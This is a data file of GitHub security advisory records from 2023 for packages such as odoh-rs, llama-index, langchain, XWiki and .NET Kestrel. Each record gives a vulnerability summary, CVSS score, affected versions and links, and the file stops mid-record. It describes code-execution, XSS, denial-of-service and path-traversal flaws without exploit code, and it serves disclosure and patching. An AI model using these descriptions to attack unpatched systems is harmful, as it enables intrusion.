1.4.0,GHSA-gpcv-p28p-fv2p,2023-08-03T16:35:20Z,2023-08-03T16:35:20Z,,['CVE-2023-3766'],odoh-rs's Invalid Slice Split Results in Server Panic,"A vulnerability was discovered in the odoh-rs rust crate that stems from faulty logic during the parsing of encrypted queries. This issue specifically occurs when processing encrypted query data received from remote clients. ### Impact An attacker with knowledge of this vulnerability could craft and send specially designed encrypted queries to targeted ODOH servers running with odoh-rs. Upon successful exploitation, the server will crash abruptly, disrupting its normal operation and rendering the service temporarily unavailable. ### Patches Users are encouraged to update their odoh-rs's rust crate to v1.0.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'odoh-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/security/advisories/GHSA-gpcv-p28p-fv2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3766'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/pull/28'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/commit/c1bc4ed71dcc9842b7dc1ea26f278f105074bbaa'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/odoh-rs'}]","{'cwe_ids': ['CWE-120'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:35:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-cx3j-qqxj-9597,2023-08-25T18:55:56Z,2023-08-11T18:57:53Z,,['CVE-2023-3481'],Critters Cross-site Scripting Vulnerability,"### Impact Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) bug. ### Patches The bug has been fixed in `v0.0.20`. ### Workarounds Upgrading Critters version to `>0.0.20` is the easiest fix. This is a non breaking version upgrade so we recommend all users to use `v0.0.20`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'critters'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.17'}, {'fixed': '0.0.20'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.19'}}]","[{'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/security/advisories/GHSA-cx3j-qqxj-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3481'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/pull/133'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/commit/7757902c9e0b3285d516359b3cb602cd9d50d80e'}, {'type': 'PACKAGE', 'url': 'https://github.com/GoogleChromeLabs/critters'}]","{'cwe_ids': ['CWE-116', 'CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T18:57:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-2xxc-73fv-36f7,2023-08-22T18:38:15Z,2023-08-15T18:31:32Z,,['CVE-2023-39662'],llama-index vulnerable to arbitrary code execution,An issue in llama_index v.0.7.13 and before allows a remote attacker to execute arbitrary code via the `exec` parameter in PandasQueryEngine function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'llama-index'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39662'}, {'type': 'WEB', 'url': 'https://github.com/jerryjliu/llama_index/issues/7054'}, {'type': 'PACKAGE', 'url': 'https://github.com/jerryjliu/llama_index'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T21:23:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-3r28-rgp9-qgv4,2023-08-31T14:59:24Z,2023-08-29T00:32:04Z,,['CVE-2023-40826'],pf4j vulnerable to remote code execution via the zippluginPath parameter,An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.pf4j:pf4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40826'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/issues/536'}, {'type': 'PACKAGE', 'url': 'https://github.com/pf4j/pf4j'}]","{'cwe_ids': ['CWE-22', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:41:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-p57v-gv7q-4xfm,2023-08-09T13:04:54Z,2023-08-09T13:04:54Z,,['CVE-2023-38178'],.NET Denial of Service Vulnerability,"# Microsoft Security Advisory CVE-2023-38178: .NET Denial of Service Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET Kestrel where a malicious client can bypass QUIC stream limit in HTTP/3 in both ASP.NET and .NET runtimes resulting in denial of service. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/268 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.9 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/ Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10 ### .NET 6 .NET 6 included HTTP/3 support as a [preview feature](https://learn.microsoft.com/dotnet/core/extensions/httpclient-http3#http3-support-in-net-6) , which requires specific opt-in code. If you are using HTTP/3 in .NET 6 you must update your application to .NET 7, where the feature is supported, to fix the vulnerability. Future versions of .NET will disable the preview feature entirely. ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * To fix this issue on Linux, please update `libmsquic` to 2.2+ * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 7.0.400 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 7.0.10 Commit: 8473146e7d .NET Core SDKs installed: 7.0.400 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.700 (for Visual Studio 2022 v17.7) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-38178]( https://www.cve.org/CVERecord?id=CVE-2023-38178) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-p57v-gv7q-4xfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38178'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38178'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:04:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-8c37-7qx3-4c4p,2023-09-21T14:13:41Z,2023-08-09T20:57:57Z,,[],Blst has logical error in SigValidate in Go bindings,"### Impact Blst versions v0.3.0 through 0.3.10 failed to perform a signature group-check if the call to `SigValidate` in the Go bindings was complemented with a check for infinity. Formally speaking, infinity, or the identity element of the elliptic curve group, is a member of the group, and the group-check should allow it. An initial review of blst users on GitHub did not uncover any use of this function with the complementary infinity check. This optional check was added as a convenience feature because despite infinity being a legitimate member of the group, individual signatures should never be infinite (as it is equivalent to having zero for the secret key), and observing one should raise a flag. ### Description The vulnerable function is declared as `SigValidate(sigInfcheck bool) bool` and if called with `sigInfcheck` argument set to `true`, the group-check was omitted. The group-check is required to be performed on untrusted input, because the pairing, the corner-stone operation of the signature scheme, is defined only on points that are members of a specific cyclic group, which is a subset of all the possible points on elliptic curves in question. Submitting an untrusted point outside the group opens up the possibility of accepting an alternative signature for a chosen message. It should be noted that the SigValidate call is not the only way to perform the group-checks. There are optional checks integrated into various other verification methods, such as `Verify`, `AggregateVerify`, etc., as well as signature aggregation methods, such as `PairingAggregate*`. The reason why there are multiple options is that the group-check is a relatively expensive operation, and application developers are arguably entitled the freedom to choose when it's performed. ### Patches This issue has been resolved in the v0.3.11 release and users are advised to update if their application is affected or alternatively omit the complementary infinity check. ### Credits A special thanks to Yunjong Jeong (@blukat29) for the discovery and disclosure of this vulnerability. ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/supranational/blst'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/supranational/blst/security/advisories/GHSA-8c37-7qx3-4c4p'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/commit/fb91221c91c82f65bfc7f243256308977a06d48b'}, {'type': 'PACKAGE', 'url': 'https://github.com/supranational/blst'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/releases/tag/v0.3.11'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T20:57:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-qxwc-wchr-5h29,2023-08-16T21:06:56Z,2023-08-16T15:30:18Z,,['CVE-2023-40348'],Jenkins Gogs Plugin vulnerable to unsafe default behavior and information disclosure,"Jenkins Gogs Plugin provides a webhook endpoint at `/gogs-webhook` that can be used to trigger builds of jobs. In Gogs Plugin 1.0.15 and earlier, an option to specify a Gogs secret for this webhook is provided, but not enabled by default. This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified job name. Additionally, the output of the webhook endpoint includes whether a job corresponding to the attacker-specified job name exists, even if the attacker has no permission to access it. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:gogs-webhook'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40348'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-2894'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:06:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-h8cm-3v5f-rgp6,2023-08-29T22:44:58Z,2023-08-21T19:59:12Z,,['CVE-2023-40176'],XWiki Platform Stored Cross-site Scripting in the user profile via the timezone displayer,"### Impact Any registered user can exploit a stored XSS through their user profile by setting the payload as the value of the time zone user preference. Even though the time zone is selected from a drop down (no free text value) it can still be set from JavaScript (using the browser developer tools) or by calling the save URL on the user profile with the right query string. Once the time zone is set it is displayed without escaping which means the payload gets executed for any user that visits the malicious user profile, allowing the attacker to steal information and even gain more access rights (escalation to programming rights). The problem is present [since version 4.1M2](https://jira.xwiki.org/browse/XWIKI-7847) when the time zone user preference was introduced. ### Patches The issue has been fixed in XWiki 14.10.5 and 15.1RC1 by https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4 . The main fix is in the [``displayer_timezone.vm``](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7d) precisely at this [line](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7dR40): $!escapetool.xml($value) By escaping the displayed time zone value we make sure the attacker's payload is not executed. ### Workarounds If you want to fix this problem on older versions of XWiki that have not been patched then you need to edit ``displayer_timezone.vm`` and escape the displayed time zone value [here](https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-14.10.4/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/displayer_timezone.vm#L32): ``` - $!value + $!escapetool.xml($value) ``` ### References * JIRA issue https://jira.xwiki.org/browse/XWIKI-20276 * Fix https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been found and reported by @michitux .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1-milestone-2'}, {'fixed': '14.10.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h8cm-3v5f-rgp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40176'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-7847'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T19:59:12Z', 'nvd_published_at': None}" 1.4.0,GHSA-7gfq-f96f-g85j,2023-08-31T14:25:01Z,2023-08-22T21:30:27Z,,['CVE-2023-36281'],langchain vulnerable to arbitrary code execution,An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.171'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36281'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/4394'}, {'type': 'WEB', 'url': 'https://aisec.today/LangChain-2e6244a313dd46139c5ef28cbcab9e55'}, {'type': 'PACKAGE', 'url': 'https://github.com/langchain-ai/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-151.yaml'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:22:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-v6c8-pwhq-288m,2023-09-01T17:33:29Z,2023-08-21T18:31:23Z,,['CVE-2023-39106'],Nacos Spring vulnerable to Unsafe Deserialization,An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-spring-context'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39106'}, {'type': 'WEB', 'url': 'https://github.com/nacos-group/nacos-spring-project/issues/314'}, {'type': 'PACKAGE', 'url': 'https://github.com/nacos-group/nacos-spring-project'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:45:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-vxvm-qww3-2fh7,2023-08-30T21:20:44Z,2023-08-29T18:31:53Z,,['CVE-2021-32050'],MongoDB Driver may publish events containing authentication-related data,"Some MongoDB Drivers may erroneously publish events containing authentication-related data to a command listener configured by an application. The published events may contain security-sensitive data when specific authentication-related commands are executed. Without due care, an application may inadvertently expose this sensitive information, e.g., by writing it to a log file. This issue only arises if an application enables the command listener feature (this is not enabled by default). This issue affects the MongoDB C Driver 1.0.0 prior to 1.17.7, MongoDB PHP Driver 1.0.0 prior to 1.9.2, MongoDB Swift Driver 1.0.0 prior to 1.1.1, MongoDB Node.js Driver 3.6 prior to 3.6.10, MongoDB Node.js Driver 4.0 prior to 4.17.0 and MongoDB Node.js Driver 5.0 prior to 5.8.0. This issue also affects users of the MongoDB C++ Driver dependent on the C driver 1.0.0 prior to 1.17.7 (C++ driver prior to 3.7.0). ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mongodb/mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.6.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.17.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.8.0'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/mongodb/mongo-swift-driver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32050'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/pull/1235'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-swift-driver/pull/643'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/commit/4495de8313c0d313e4dde906fc7aedf998ee3748'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/node-mongodb-native/commit/8c8b4c3b8c55f10fb96f63d3bbfa5d408b4ed7d0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CDRIVER-3797'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CXX-2028'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/NODE-3356'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/PHPC-1869'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/SWIFT-1229'}]","{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T21:20:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-wmwf-49vv-p3mr,2023-08-04T13:31:19Z,2023-08-03T19:44:28Z,,['CVE-2023-39343'],Sulu Observable Response Discrepancy on Admin Login,"### Impact It allows over the Admin Login form to detect which user (username, email) exists and which one do not exist. Impacted by this issue are Sulu installation >= 2.5.0 and <2.5.10 using the newer Symfony Security System which is default since Symfony 6.0 but can be enabled in Symfony 5.4. Sulu Installation not using the old Symfony 5.4 security System and previous version are not impacted by this Security issue. ### Patches The problem has been patched in version 2.5.10. ### Workarounds Create a custom AuthenticationFailureHandler which does not return the `$exception->getMessage();` instead the `$exception->getMessageKey();` ### References Currently no references. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-wmwf-49vv-p3mr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39343'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/5f6c98ba030b2005793e2dc647cc938937ea889b'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sulu/sulu/CVE-2023-39343.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/releases/tag/2.5.10'}]","{'cwe_ids': ['CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-g454-wj9r-jpg4,2023-09-06T21:30:59Z,2023-08-31T00:30:17Z,,['CVE-2023-39135'],Path traversal in Zip Swift,An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/marmelroy/Zip'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39135'}, {'type': 'WEB', 'url': 'https://github.com/marmelroy/Zip/issues/245'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 